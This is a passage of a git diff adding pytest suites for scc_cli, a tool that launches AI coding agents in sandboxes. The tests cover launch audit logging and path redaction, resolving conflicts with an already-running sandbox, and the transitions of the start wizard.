dependencies = WorktreeDependencies( + git_client=git_client, + dependency_installer=MagicMock(), + ) + fake_adapters = build_fake_adapters() + + with ( + patch( + "scc_cli.commands.worktree.worktree_commands._build_worktree_dependencies", + return_value=(dependencies, fake_adapters), + ), + patch( + "scc_cli.commands.worktree.worktree_commands.worktree_use_cases.create_worktree", + return_value=WorktreeCreateResult( + worktree_path=worktree_path, + worktree_name="feature-blocked", + branch_name="scc/feature-blocked", + base_branch="main", + dependencies_installed=True, + ), + ), + patch( + "scc_cli.commands.worktree.worktree_commands.config.is_standalone_mode", + return_value=False, + ), + patch( + "scc_cli.commands.worktree.worktree_commands.config.load_user_config", + return_value={"selected_profile": "platform"}, + ), + patch( + "scc_cli.commands.worktree.worktree_commands.config.load_cached_org_config", + return_value={}, + ), + patch( + "scc_cli.commands.worktree.worktree_commands.resolve_launch_provider", + return_value=("claude", None), + ), + patch( + "scc_cli.commands.worktree.worktree_commands.collect_launch_readiness", + return_value=MagicMock(launch_ready=True), + ), + patch( + "scc_cli.application.start_session.compute_effective_config", + return_value=EffectiveConfig(network_policy="locked-down-web"), + ), + patch( + "scc_cli.application.start_session.sync_marketplace_settings_for_start", + return_value=(None, None), + ), + patch("scc_cli.commands.worktree.worktree_commands.Confirm.ask", return_value=True), + ): + result = runner.invoke( + app, + ["worktree", ".", "create", str(git_workspace), "feature-blocked"], + ) + + assert result.exit_code != 0 + assert fake_adapters.sandbox_runtime.list_running() == [] + assert isinstance(fake_adapters.audit_event_sink, FakeAuditEventSink) + assert [event.event_type for event in fake_adapters.audit_event_sink.events] == [ + "launch.preflight.failed" + ] + # ═══════════════════════════════════════════════════════════════════════════════ # Workflow 8: Offline Mode @@ -579,11 +726,14 @@ def test_start_with_install_deps(self, full_config_environment, git_workspace): remote_fetcher=base_adapters.remote_fetcher, clock=base_adapters.clock, agent_runner=base_adapters.agent_runner, + agent_provider=base_adapters.agent_provider, sandbox_runtime=base_adapters.sandbox_runtime, personal_profile_service=base_adapters.personal_profile_service, doctor_runner=base_adapters.doctor_runner, archive_writer=base_adapters.archive_writer, config_store=base_adapters.config_store, + audit_event_sink=base_adapters.audit_event_sink, + codex_agent_provider=FakeAgentProvider(), ) with ( diff --git a/tests/test_launch_audit_support.py b/tests/test_launch_audit_support.py new file mode 100644 index 0000000..1ea2a81 --- /dev/null +++ b/tests/test_launch_audit_support.py @@ -0,0 +1,227 @@ +from __future__ import annotations + +import json +from pathlib import Path + +from typer.testing import CliRunner + +from scc_cli.adapters.local_audit_event_sink import serialize_audit_event +from scc_cli.cli import app +from scc_cli.core.contracts import AuditEvent +from scc_cli.core.enums import SeverityLevel + +runner = CliRunner() + + +def _write_audit_lines(path: Path, lines: list[str | bytes]) -> None: + path.parent.mkdir(parents=True, exist_ok=True) + with path.open("wb") as handle: + for line in lines: + payload = line if isinstance(line, bytes) else line.encode("utf-8") + handle.write(payload) + handle.write(b"\n") + + +def _event( + *, + event_type: str, + severity: SeverityLevel = SeverityLevel.INFO, + provider_id: str, + message: str, + metadata: dict[str, str] | None = None, +) -> str: + return serialize_audit_event( + AuditEvent( + event_type=event_type, + message=message, + severity=severity, + subject=provider_id, + metadata={"provider_id": provider_id, **(metadata or {})}, + ) + ) + + +def test_read_launch_audit_diagnostics_handles_missing_file(tmp_path: Path) -> None: + from scc_cli.application.launch.audit_log import read_launch_audit_diagnostics + + diagnostics = read_launch_audit_diagnostics(audit_path=tmp_path / "missing.jsonl", limit=5) + + assert diagnostics.state == "unavailable" + assert diagnostics.recent_events == () + assert diagnostics.last_failure is None + assert diagnostics.malformed_line_count == 0 + + +def test_read_launch_audit_diagnostics_handles_empty_file(tmp_path: Path) -> None: + from scc_cli.application.launch.audit_log import read_launch_audit_diagnostics + + audit_path = tmp_path / "launch-events.jsonl" + audit_path.write_text("", encoding="utf-8") + + diagnostics = read_launch_audit_diagnostics(audit_path=audit_path, limit=5) + + assert diagnostics.state == "empty" + assert diagnostics.scanned_line_count == 0 + assert diagnostics.recent_events == () + + +def test_read_launch_audit_diagnostics_skips_malformed_lines_and_redacts_paths( + tmp_path: Path, +) -> None: + from scc_cli.application.launch.audit_log import read_launch_audit_diagnostics + + home = str(Path.home()) + audit_path = tmp_path / "launch-events.jsonl" + _write_audit_lines( + audit_path, + [ + _event( + event_type="launch.preflight.passed", + provider_id="claude", + message="Launch preflight passed.", + metadata={"workspace_path": f"{home}/projects/demo"}, + ), + "{not-json", + _event( + event_type="launch.preflight.failed", + provider_id="claude", + severity=SeverityLevel.ERROR, + message="Launch preflight failed.", + metadata={ + "workspace_path": f"{home}/projects/demo", + "failure_reason": f"Blocked for {home}/projects/demo", + }, + ), + _event( + event_type="launch.started", + provider_id="codex", + message="Launch started.", + metadata={"workspace_path": f"{home}/projects/other"}, + ), + ], + ) + + diagnostics = read_launch_audit_diagnostics(audit_path=audit_path, limit=2) + + assert diagnostics.state == "available" + assert diagnostics.malformed_line_count == 1 + assert diagnostics.last_malformed_line == 2 + assert [event.event_type for event in diagnostics.recent_events] == [ + "launch.started", + "launch.preflight.failed", + ] + assert diagnostics.last_failure is not None + assert diagnostics.last_failure.event_type == "launch.preflight.failed" + assert diagnostics.last_failure.failure_reason == "Blocked for ~/projects/demo" + assert diagnostics.recent_events[0].metadata["workspace_path"] == "~/projects/other" + assert diagnostics.sink_path.startswith("~") or str(Path.home()) not in diagnostics.sink_path + + +def test_read_launch_audit_diagnostics_replaces_invalid_utf8_bytes(tmp_path: Path) -> None: + from scc_cli.application.launch.audit_log import read_launch_audit_diagnostics + + audit_path = tmp_path / "launch-events.jsonl" + _write_audit_lines( + audit_path, + [ + b'{"event_type":"launch.started","message":"bad\xffvalue","severity":"info",' + b'"occurred_at":"2026-04-03T18:00:00+00:00","subject":"claude",' + b'"metadata":{"provider_id":"claude"}}' + ], + ) + + diagnostics = read_launch_audit_diagnostics(audit_path=audit_path, limit=1) + + assert diagnostics.state == "available" + assert diagnostics.malformed_line_count == 0 + assert diagnostics.recent_events[0].message == "bad�value" + + +def test_read_launch_audit_diagnostics_handles_unreadable_path(tmp_path: Path) -> None: + from scc_cli.application.launch.audit_log import read_launch_audit_diagnostics + + audit_path = tmp_path / "launch-events.jsonl" + audit_path.mkdir() + + diagnostics = read_launch_audit_diagnostics(audit_path=audit_path, limit=3) + + assert diagnostics.state == "unavailable" + assert diagnostics.error is not None + + +def test_read_launch_audit_diagnostics_respects_zero_limit(tmp_path: Path) -> None: + from scc_cli.application.launch.audit_log import read_launch_audit_diagnostics + + audit_path = tmp_path / "launch-events.jsonl" + _write_audit_lines( + audit_path, + [ + _event( + event_type="launch.started", + provider_id="claude", + message="Launch started.", + ) + ], + ) + + diagnostics = read_launch_audit_diagnostics(audit_path=audit_path, limit=0) + + assert diagnostics.state == "available" + assert diagnostics.recent_events == () + assert diagnostics.scanned_line_count == 0 + + +def test_support_launch_audit_json_outputs_stable_envelope(tmp_path: Path, monkeypatch) -> None: + audit_path = tmp_path / "launch-events.jsonl" + _write_audit_lines( + audit_path, + [ + _event( + event_type="launch.preflight.failed", + provider_id="claude", + severity=SeverityLevel.ERROR, + message="Launch preflight failed.", + metadata={ + "workspace_path": f"{Path.home()}/projects/demo", + "failure_reason": "Policy blocked provider-core access", + }, + ) + ], + ) + monkeypatch.setattr("scc_cli.commands.support.config.LAUNCH_AUDIT_FILE", audit_path) + + result = runner.invoke(app, ["support", "launch-audit", "--json", "--limit", "1"]) + + assert result.exit_code == 0 + envelope = json.loads(result.stdout) + assert envelope["kind"] == "LaunchAudit" + assert envelope["status"]["ok"] is True + assert envelope["data"]["state"] == "available" + assert envelope["data"]["recent_events"][0]["event_type"] == "launch.preflight.failed" + assert envelope["data"]["recent_events"][0]["metadata"]["workspace_path"] == "~/projects/demo" + + +def test_support_launch_audit_human_output_mentions_last_failure( + tmp_path: Path, monkeypatch +) -> None: + audit_path = tmp_path / "launch-events.jsonl" + _write_audit_lines( + audit_path, + [ + _event( + event_type="launch.preflight.failed", + provider_id="claude", + severity=SeverityLevel.ERROR, + message="Launch preflight failed.", + metadata={"failure_reason": "Destination set blocked"}, + ) + ], + ) + monkeypatch.setattr("scc_cli.commands.support.config.LAUNCH_AUDIT_FILE", audit_path) + + result = runner.invoke(app, ["support", "launch-audit", "--limit", "1"]) + + assert result.exit_code == 0 + assert "Launch audit" in result.stdout + assert "Last failure" in result.stdout + assert "Destination set blocked" in result.stdout diff --git a/tests/test_launch_conflict_resolution.py b/tests/test_launch_conflict_resolution.py new file mode 100644 index 0000000..2b5ba15 --- /dev/null +++ b/tests/test_launch_conflict_resolution.py @@ -0,0 +1,217 @@ +from __future__ import annotations + +from dataclasses import dataclass +from io import StringIO +from pathlib import Path +from unittest.mock import MagicMock, patch + +import pytest +from rich.console import Console + +from scc_cli.application.start_session import StartSessionDependencies, StartSessionPlan +from scc_cli.commands.launch.conflict_resolution import ( + LaunchConflictDecision, + _ConflictAction, + resolve_launch_conflict, +) +from scc_cli.core.errors import ExistingSandboxConflictError +from scc_cli.core.workspace import ResolverResult +from scc_cli.ports.models import ( + MountSpec, + SandboxConflict, + SandboxHandle, + SandboxSpec, + SandboxState, +) + + +@dataclass +class _ConflictRuntime: + conflict: SandboxConflict | None = None + + def ensure_available(self) -> None: + return None + + def run(self, spec: SandboxSpec): # pragma: no cover - not used in these tests + raise NotImplementedError + + def detect_launch_conflict(self, spec: SandboxSpec) -> SandboxConflict | None: + return self.conflict + + def resume(self, handle): # pragma: no cover - protocol completeness + return None + + def stop(self, handle): # pragma: no cover - protocol completeness + return None + + def remove(self, handle): # pragma: no cover - protocol completeness + return None + + def list_running(self): # pragma: no cover - protocol completeness + return [] + + def status(self, handle): # pragma: no cover - protocol completeness + raise NotImplementedError + + +def _build_plan(tmp_path: Path) -> StartSessionPlan: + workspace = tmp_path / "workspace" + workspace.mkdir() + resolver = ResolverResult( + workspace_root=workspace, + entry_dir=workspace, + mount_root=workspace, + container_workdir=str(workspace), + is_auto_detected=False, + is_suspicious=False, + reason="test", + ) + sandbox_spec = SandboxSpec( + image="scc-agent-codex:latest", + workspace_mount=MountSpec(source=workspace, target=workspace), + workdir=workspace, + provider_id="codex", + ) + return StartSessionPlan( + resolver_result=resolver, + workspace_path=workspace, + team=None, + session_name="demo", + resume=False, + fresh=False, + current_branch="feature/demo", + effective_config=None, + sync_result=None, + sync_error_message=None, + agent_settings=None, + sandbox_spec=sandbox_spec, + agent_launch_spec=None, + ) + + +def _build_dependencies(conflict: SandboxConflict | None) -> StartSessionDependencies: + return StartSessionDependencies( + filesystem=MagicMock(), + remote_fetcher=MagicMock(), + clock=MagicMock(), + git_client=MagicMock(), + agent_runner=MagicMock(), + sandbox_runtime=_ConflictRuntime(conflict=conflict), + resolve_effective_config=MagicMock(), + materialize_marketplace=MagicMock(), + ) + + +def _console() -> Console: + return Console(file=StringIO(), force_terminal=False, width=120) + + +def _conflict() -> SandboxConflict: + return SandboxConflict( + handle=SandboxHandle(sandbox_id="cid-123", name="scc-oci-123"), + state=SandboxState.RUNNING, + process_summary="codex --dangerously-bypass-approvals-and-sandbox", + ) + + +def test_resolve_launch_conflict_returns_proceed_when_no_conflict(tmp_path: Path) -> None: + plan = _build_plan(tmp_path) + resolution = resolve_launch_conflict( + plan, + dependencies=_build_dependencies(None), + console=_console(), + display_name="Codex", + json_mode=False, + non_interactive=False, + ) + + assert resolution.decision is LaunchConflictDecision.PROCEED + assert resolution.plan is plan + assert resolution.conflict is None + + +def test_resolve_launch_conflict_non_interactive_raises_actionable_error(tmp_path: Path) -> None: + plan = _build_plan(tmp_path) + + with pytest.raises(ExistingSandboxConflictError, match="already running"): + resolve_launch_conflict( + plan, + dependencies=_build_dependencies(_conflict()), + console=_console(), + display_name="Codex", + json_mode=False, + non_interactive=True, + ) + + +@patch("scc_cli.commands.launch.conflict_resolution.is_interactive_allowed", return_value=True) +@patch("scc_cli.commands.launch.conflict_resolution._prompt_for_conflict") +def test_resolve_launch_conflict_replace_marks_plan_fresh( + mock_prompt: MagicMock, + mock_interactive_allowed: MagicMock, + tmp_path: Path, +) -> None: + plan = _build_plan(tmp_path) + mock_prompt.return_value = _ConflictAction.REPLACE + + resolution = resolve_launch_conflict( + plan, + dependencies=_build_dependencies(_conflict()), + console=_console(), + display_name="Codex", + json_mode=False, + non_interactive=False, + ) + + assert resolution.decision is LaunchConflictDecision.PROCEED + assert resolution.conflict is not None + assert resolution.plan.sandbox_spec is not None + assert resolution.plan.sandbox_spec.force_new is True + assert plan.sandbox_spec is not None + assert plan.sandbox_spec.force_new is False + + +@patch("scc_cli.commands.launch.conflict_resolution.is_interactive_allowed", return_value=True) +@patch("scc_cli.commands.launch.conflict_resolution._prompt_for_conflict") +def test_resolve_launch_conflict_keep_existing_returns_keep_decision( + mock_prompt: MagicMock, + mock_interactive_allowed: MagicMock, + tmp_path: Path, +) -> None: + plan = _build_plan(tmp_path) + mock_prompt.return_value = _ConflictAction.KEEP + + resolution = resolve_launch_conflict( + plan, + dependencies=_build_dependencies(_conflict()), + console=_console(), + display_name="Codex", + json_mode=False, + non_interactive=False, + ) + + assert resolution.decision is LaunchConflictDecision.KEEP_EXISTING + assert resolution.plan is plan + + +@patch("scc_cli.commands.launch.conflict_resolution.is_interactive_allowed", return_value=True) +@patch("scc_cli.commands.launch.conflict_resolution._prompt_for_conflict") +def test_resolve_launch_conflict_cancel_returns_cancelled( + mock_prompt: MagicMock, + mock_interactive_allowed: MagicMock, + tmp_path: Path, +) -> None: + plan = _build_plan(tmp_path) + mock_prompt.return_value = _ConflictAction.CANCEL + + resolution = resolve_launch_conflict( + plan, + dependencies=_build_dependencies(_conflict()), + console=_console(), + display_name="Codex", + json_mode=False, + non_interactive=False, + ) + + assert resolution.decision is LaunchConflictDecision.CANCELLED + assert resolution.plan is plan diff --git a/tests/test_launch_flow_characterization.py b/tests/test_launch_flow_characterization.py new file mode 100644 index 0000000..b4330aa --- /dev/null +++ b/tests/test_launch_flow_characterization.py @@ -0,0 +1,324 @@ +"""Characterization tests for commands/launch/flow.py. + +These tests capture the current behavior of the launch flow module +before S02 surgery decomposes it. They protect against accidental behavior +changes during the split. + +Target: src/scc_cli/commands/launch/flow.py + - start() (293 lines): CLI entrypoint + - interactive_start() (534 lines): wizard flow + +Since both functions are deeply coupled to TTY interactions, Rich UI, and +the full bootstrap stack, we test the pure logic they delegate to: + - _resolve_session_selection early-return paths (mocked dependencies) + - Application-layer wizard state machine (initialize/apply/step) + - start() CLI integration via typer test runner (key error paths) +""" + +from __future__ import annotations + +from pathlib import Path +from typing import Any +from unittest.mock import MagicMock, patch + +from scc_cli.application.launch import ( + BackRequested, + QuickResumeDismissed, + SessionNameEntered, + StartWizardConfig, + StartWizardStep, + TeamSelected, + WorkspaceSelected, + WorkspaceSourceChosen, + WorktreeSelected, + apply_start_wizard_event, + initialize_start_wizard, +) +from scc_cli.core.exit_codes import EXIT_CANCELLED, EXIT_CONFIG, EXIT_USAGE +from scc_cli.ui.wizard import WorkspaceSource + +# ═══════════════════════════════════════════════════════════════════════════════ +# Wizard State Machine (application layer) +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestStartWizardStateMachine: + """Characterize the start wizard state transitions that interactive_start delegates to.""" + + def test_initialize_with_quick_resume_starts_there(self) -> None: + """When quick_resume_enabled, wizard starts at QUICK_RESUME step.""" + config = StartWizardConfig( + quick_resume_enabled=True, + team_selection_required=False, + allow_back=False, + ) + state = initialize_start_wizard(config) + assert state.step is StartWizardStep.QUICK_RESUME + + def test_initialize_without_quick_resume_starts_at_team(self) -> None: + """When quick_resume disabled but team required, starts at TEAM_SELECTION.""" + config = StartWizardConfig( + quick_resume_enabled=False, + team_selection_required=True, + allow_back=False, + ) + state = initialize_start_wizard(config) + assert state.step is StartWizardStep.TEAM_SELECTION + + def test_initialize_no_resume_no_team_goes_to_workspace(self) -> None: + """When both quick_resume and team_selection disabled, goes to WORKSPACE_SOURCE.""" + config = StartWizardConfig( + quick_resume_enabled=False, + team_selection_required=False, + allow_back=False, + ) + state = initialize_start_wizard(config) + assert state.step is StartWizardStep.WORKSPACE_SOURCE + + def test_quick_resume_dismissed_advances_to_team_or_workspace(self) -> None: + """Dismissing quick resume moves forward.""" + config = StartWizardConfig( + quick_resume_enabled=True, + team_selection_required=True, + allow_back=False, + ) + state = initialize_start_wizard(config) + state = apply_start_wizard_event(state, QuickResumeDismissed()) + assert state.step is StartWizardStep.TEAM_SELECTION + + def test_team_selected_advances_to_workspace_source(self) -> None: + """After team selection, wizard advances to workspace source step.""" + config = StartWizardConfig( + quick_resume_enabled=False, + team_selection_required=True, + allow_back=False, + ) + state = initialize_start_wizard(config) + state = apply_start_wizard_event(state, TeamSelected(team="my-team")) + assert state.step is StartWizardStep.WORKSPACE_SOURCE + assert state.context.team == "my-team" + + def test_team_selected_none_in_standalone(self) -> None: + """Standalone mode: TeamSelected(team=None) still advances.""" + config = StartWizardConfig( + quick_resume_enabled=False, + team_selection_required=True, + allow_back=False, + ) + state = initialize_start_wizard(config) + state = apply_start_wizard_event(state, TeamSelected(team=None)) + assert state.step is StartWizardStep.WORKSPACE_SOURCE + assert state.context.team is None + + def test_workspace_source_chosen_advances_to_picker(self) -> None: + """Choosing a workspace source advances to WORKSPACE_PICKER.""" + config = StartWizardConfig( + quick_resume_enabled=False, + team_selection_required=False, + allow_back=False, + ) + state = initialize_start_wizard(config) + state = apply_start_wizard_event( + state, WorkspaceSourceChosen(source=WorkspaceSource.RECENT) + ) + assert state.step is StartWizardStep.WORKSPACE_PICKER + + def test_back_from_workspace_source_returns_to_team(self) -> None: + """BackRequested from WORKSPACE_SOURCE → back to TEAM_SELECTION if team was required.""" + config = StartWizardConfig( + quick_resume_enabled=False, + team_selection_required=True, + allow_back=False, + ) + state = initialize_start_wizard(config) + state = apply_start_wizard_event(state, TeamSelected(team="t")) + assert state.step is StartWizardStep.WORKSPACE_SOURCE + state = apply_start_wizard_event(state, BackRequested()) + assert state.step is StartWizardStep.TEAM_SELECTION + + def test_workspace_selected_advances_to_worktree_decision(self) -> None: + """WorkspaceSelected in WORKSPACE_PICKER → WORKTREE_DECISION step.""" + config = StartWizardConfig( + quick_resume_enabled=False, + team_selection_required=False, + allow_back=False, + ) + state = initialize_start_wizard(config) + state = apply_start_wizard_event( + state, WorkspaceSourceChosen(source=WorkspaceSource.RECENT) + ) + assert state.step is StartWizardStep.WORKSPACE_PICKER + state = apply_start_wizard_event(state, WorkspaceSelected(workspace="/my/proj")) + assert state.step is StartWizardStep.WORKTREE_DECISION + assert state.context.workspace == "/my/proj" + + def test_worktree_selected_advances_to_session_name(self) -> None: + """WorktreeSelected in WORKTREE_DECISION → SESSION_NAME step.""" + config = StartWizardConfig( + quick_resume_enabled=False, + team_selection_required=False, + allow_back=False, + ) + state = initialize_start_wizard(config) + state = apply_start_wizard_event( + state, WorkspaceSourceChosen(source=WorkspaceSource.RECENT) + ) + state = apply_start_wizard_event(state, WorkspaceSelected(workspace="/proj")) + state = apply_start_wizard_event(state, WorktreeSelected(worktree_name=None)) + assert state.step is StartWizardStep.SESSION_NAME + + def test_session_name_entered_completes_wizard(self) -> None: + """SessionNameEntered → COMPLETE step.""" + config = StartWizardConfig( + quick_resume_enabled=False, + team_selection_required=False, + allow_back=False, + ) + state = initialize_start_wizard(config) + state = apply_start_wizard_event( + state, WorkspaceSourceChosen(source=WorkspaceSource.RECENT) + ) + state = apply_start_wizard_event(state, WorkspaceSelected(workspace="/proj")) + state = apply_start_wizard_event(state, WorktreeSelected(worktree_name=None)) + state = apply_start_wizard_event(state, SessionNameEntered(session_name="my-session")) + assert state.step is StartWizardStep.COMPLETE + assert state.context.session_name == "my-session" + + +# ═══════════════════════════════════════════════════════════════════════════════ +# start() CLI error paths (via typer test runner) +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestStartCLIErrorPaths: + """Characterize start() early-exit behavior via CLI invocation.""" + + def test_debug_flag_after_command_shows_usage_error(self, cli_runner: Any, app: Any) -> None: + """Passing --debug after 'start' shows helpful error about global flag placement.""" + result = cli_runner.invoke(app, ["start", "--debug"]) + assert result.exit_code == EXIT_USAGE + + @patch("scc_cli.commands.launch.flow.config.load_cached_org_config", return_value=None) + def test_offline_without_cache_exits_config_error( + self, + mock_cache: MagicMock, + cli_runner: Any, + app: Any, + ) -> None: + """--offline without cached org config exits with EXIT_CONFIG.""" + result = cli_runner.invoke(app, ["start", "--offline"]) + assert result.exit_code == EXIT_CONFIG + + @patch("scc_cli.commands.launch.flow.setup.is_setup_needed", return_value=False) + @patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}) + @patch("scc_cli.commands.launch.flow.get_default_adapters") + @patch("scc_cli.commands.launch.flow.sessions.get_session_service") + @patch("scc_cli.commands.launch.flow_session.is_interactive_allowed", return_value=False) + @patch("scc_cli.commands.launch.flow.config.is_standalone_mode", return_value=True) + def test_non_interactive_no_workspace_dry_run_resolves_or_errors( + self, + mock_standalone: MagicMock, + mock_interactive: MagicMock, + mock_session_svc: MagicMock, + mock_adapters: MagicMock, + mock_cfg: MagicMock, + mock_setup: MagicMock, + cli_runner: Any, + app: Any, + ) -> None: + """--standalone --dry-run without workspace tries auto-detect → exits with usage error if not in a git repo.""" + with patch( + "scc_cli.commands.launch.flow._resolve_session_selection", + return_value=(None, None, None, None, False, False, None), + ): + result = cli_runner.invoke(app, ["start", "--standalone", "--dry-run"]) + # No workspace resolved → EXIT_USAGE or EXIT_CANCELLED + assert result.exit_code in {EXIT_USAGE, EXIT_CANCELLED} + + +# ═══════════════════════════════════════════════════════════════════════════════ +# _resolve_session_selection logic (unit-level) +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestResolveSessionSelection: + """Characterize _resolve_session_selection return structure.""" + + @patch("scc_cli.commands.launch.flow_session.is_interactive_allowed", return_value=False) + def test_dry_run_auto_detects_workspace(self, mock_gate: MagicMock) -> None: + """--dry-run without workspace tries resolve_workspace auto-detection.""" + from scc_cli.commands.launch.flow import _resolve_session_selection + + mock_session_svc = MagicMock() + + with patch("scc_cli.application.workspace.resolve_workspace") as mock_resolve: + mock_resolve.return_value = MagicMock(workspace_root=Path("/auto/detected")) + + result = _resolve_session_selection( + workspace=None, + team=None, + resume=False, + select=False, + cfg={}, + json_mode=False, + standalone_override=False, + no_interactive=True, + dry_run=True, + session_service=mock_session_svc, + ) + workspace, team, session_name, worktree_name, cancelled, was_auto, session_provider = ( + result + ) + assert workspace == "/auto/detected" + assert was_auto is True + assert cancelled is False + assert session_provider is None + + def test_explicit_workspace_passthrough(self) -> None: + """Explicit workspace arg passes through without session selection.""" + from scc_cli.commands.launch.flow import _resolve_session_selection + + mock_session_svc = MagicMock() + + result = _resolve_session_selection( + workspace="/my/project", + team="my-team", + resume=False, + select=False, + cfg={}, + json_mode=False, + standalone_override=False, + no_interactive=False, + dry_run=False, + session_service=mock_session_svc, + ) + workspace, team, session_name, worktree_name, cancelled, was_auto, session_provider = result + assert workspace == "/my/project" + assert team == "my-team" + assert cancelled is False + assert was_auto is False + assert session_provider is None + + @patch("scc_cli.commands.launch.flow_session.select_session") + def test_resume_no_active_team_returns_none(self, mock_select: MagicMock) -> None: + """--resume with no team and no selected_profile → returns None workspace.""" + from scc_cli.commands.launch.flow import _resolve_session_selection + + mock_session_svc = MagicMock() + + result = _resolve_session_selection( + workspace=None, + team=None, + resume=True, + select=False, + cfg={}, + json_mode=False, + standalone_override=False, + no_interactive=False, + dry_run=False, + session_service=mock_session_svc, + ) + workspace, team, session_name, worktree_name, cancelled, was_auto, session_provider = result + assert workspace is None + assert cancelled is False + assert session_provider is None diff --git a/tests/test_launch_flow_hotspots.py b/tests/test_launch_flow_hotspots.py new file mode 100644 index 0000000..1625bbe --- /dev/null +++ b/tests/test_launch_flow_hotspots.py @@ -0,0 +1,221 @@ +"""Guardrail tests for launch-flow resume hotspot extraction.""" + +from __future__ import annotations + +import ast +from pathlib import Path + +import pytest + +from scc_cli.application.launch import ( + StartWizardConfig, + StartWizardContext, + StartWizardState, + StartWizardStep, +) +from scc_cli.commands.launch.flow_types import WizardResumeContext +from scc_cli.contexts import WorkContext +from scc_cli.ui.wizard import ( + StartWizardAction, + StartWizardAnswer, + StartWizardAnswerKind, + WorkspaceSource, +) + +FLOW_PATH = ( + Path(__file__).resolve().parents[1] + / "src" + / "scc_cli" + / "commands" + / "launch" + / "flow_interactive.py" +) +MAX_INTERACTIVE_START_LINES = 550 + + +def _interactive_start_node() -> ast.FunctionDef: + tree = ast.parse(FLOW_PATH.read_text(encoding="utf-8"), filename=str(FLOW_PATH)) + for node in tree.body: + if isinstance(node, ast.FunctionDef) and node.name == "interactive_start": + return node + raise AssertionError("interactive_start not found") + + +def _resume_context( + *, + standalone_mode: bool = False, + allow_back: bool = False, + effective_team: str | None = None, + team_override: str | None = None, +) -> WizardResumeContext: + return WizardResumeContext( + standalone_mode=standalone_mode, + allow_back=allow_back, + effective_team=effective_team, + team_override=team_override, + active_team_label=effective_team or "standalone", + active_team_context=f"Team: {effective_team or 'standalone'}", + current_branch=None, + ) + + +def test_interactive_start_resume_hotspot_stays_extracted() -> None: + """interactive_start should delegate resume branches instead of inlining them again.""" + node = _interactive_start_node() + line_count = (node.end_lineno or 0) - node.lineno + 1 + nested_functions = sorted( + child.name + for child in ast.walk(node) + if isinstance(child, ast.FunctionDef) and child is not node + ) + + assert line_count <= MAX_INTERACTIVE_START_LINES + assert nested_functions == [] + + +def test_handle_top_level_quick_resume_rejects_non_context_selection( + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Malformed quick-resume answers should fail loudly in the extracted helper.""" + import scc_cli.commands.launch.wizard_resume as wizard_resume + from scc_cli.application.launch import initialize_start_wizard + + context = WorkContext( + team=None, + repo_root=Path("/repo"), + worktree_path=Path("/repo"), + worktree_name="main", + ) + state = initialize_start_wizard( + StartWizardConfig( + quick_resume_enabled=True, + team_selection_required=False, + allow_back=False, + ) + ) + monkeypatch.setattr(wizard_resume, "load_recent_contexts", lambda *args, **kwargs: [context]) + monkeypatch.setattr( + wizard_resume, + "render_start_wizard_prompt", + lambda *args, **kwargs: StartWizardAnswer( + kind=StartWizardAnswerKind.SELECTED, + value="not-a-context", + ), + ) + + with pytest.raises(wizard_resume.ResumeWizardError): + wizard_resume.handle_top_level_quick_resume( + state, + render_context=_resume_context(standalone_mode=True), + show_all_teams=False, + ) + + +def test_prompt_workspace_quick_resume_rejects_non_boolean_confirmation( + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Cross-team confirmation must stay boolean so helpers cannot take the wrong branch.""" + import scc_cli.commands.launch.wizard_resume as wizard_resume + + context = WorkContext( + team="alpha", + repo_root=Path("/repo"), + worktree_path=Path("/repo"), + worktree_name="main", + last_session_id="session-1", + ) + answers = iter( + [ + StartWizardAnswer(kind=StartWizardAnswerKind.SELECTED, value=context), + StartWizardAnswer(kind=StartWizardAnswerKind.SELECTED, value="yes"), + ] + ) + monkeypatch.setattr(wizard_resume, "load_recent_contexts", lambda *args, **kwargs: [context]) + monkeypatch.setattr( + wizard_resume, + "render_start_wizard_prompt", + lambda *args, **kwargs: next(answers), + ) + + with pytest.raises(wizard_resume.ResumeWizardError): + wizard_resume.prompt_workspace_quick_resume( + "/repo", + team="beta", + render_context=_resume_context(effective_team="beta"), + ) + + +def test_resolve_workspace_resume_back_returns_to_workspace_picker( + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Workspace quick-resume back-navigation should leave the picker step active.""" + import scc_cli.commands.launch.wizard_resume as wizard_resume + + state = StartWizardState( + step=StartWizardStep.WORKSPACE_PICKER, + context=StartWizardContext(team="alpha", workspace_source=WorkspaceSource.RECENT), + config=StartWizardConfig( + quick_resume_enabled=True, + team_selection_required=True, + allow_back=False, + ), + ) + monkeypatch.setattr( + wizard_resume, + "prompt_workspace_quick_resume", + lambda *args, **kwargs: StartWizardAnswer(kind=StartWizardAnswerKind.BACK), + ) + + resolution, show_all_teams = wizard_resume.resolve_workspace_resume( + state, + "/repo", + workspace_source=WorkspaceSource.RECENT, + render_context=_resume_context(effective_team="alpha"), + show_all_teams=False, + ) + + assert resolution is None + assert show_all_teams is False + + +def test_resolve_workspace_resume_switch_team_resets_state( + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Team-switch from workspace quick resume should clear workspace state and filters.""" + import scc_cli.commands.launch.wizard_resume as wizard_resume + + state = StartWizardState( + step=StartWizardStep.WORKSPACE_PICKER, + context=StartWizardContext( + team="alpha", + workspace_source=WorkspaceSource.RECENT, + workspace="/repo", + ), + config=StartWizardConfig( + quick_resume_enabled=True, + team_selection_required=True, + allow_back=False, + ), + ) + monkeypatch.setattr( + wizard_resume, + "prompt_workspace_quick_resume", + lambda *args, **kwargs: StartWizardAnswer( + kind=StartWizardAnswerKind.SELECTED, + value=StartWizardAction.SWITCH_TEAM, + ), + ) + + resolution, show_all_teams = wizard_resume.resolve_workspace_resume( + state, + "/repo", + workspace_source=WorkspaceSource.RECENT, + render_context=_resume_context(effective_team="alpha"), + show_all_teams=True, + ) + + assert isinstance(resolution, StartWizardState) + assert resolution.step is StartWizardStep.TEAM_SELECTION + assert resolution.context.team is None + assert resolution.context.workspace is None + assert show_all_teams is False diff --git a/tests/test_launch_preflight.py b/tests/test_launch_preflight.py new file mode 100644 index 0000000..edaca1d --- /dev/null +++ b/tests/test_launch_preflight.py @@ -0,0 +1,905 @@ +from __future__ import annotations + +from dataclasses import dataclass, field +from pathlib import Path +from unittest.mock import MagicMock, patch + +import pytest + +from scc_cli.application.launch.finalize_launch import finalize_launch +from scc_cli.application.launch.preflight import evaluate_launch_preflight +from scc_cli.application.start_session import StartSessionDependencies, StartSessionPlan +from scc_cli.commands.launch.preflight import ( + AuthStatus, 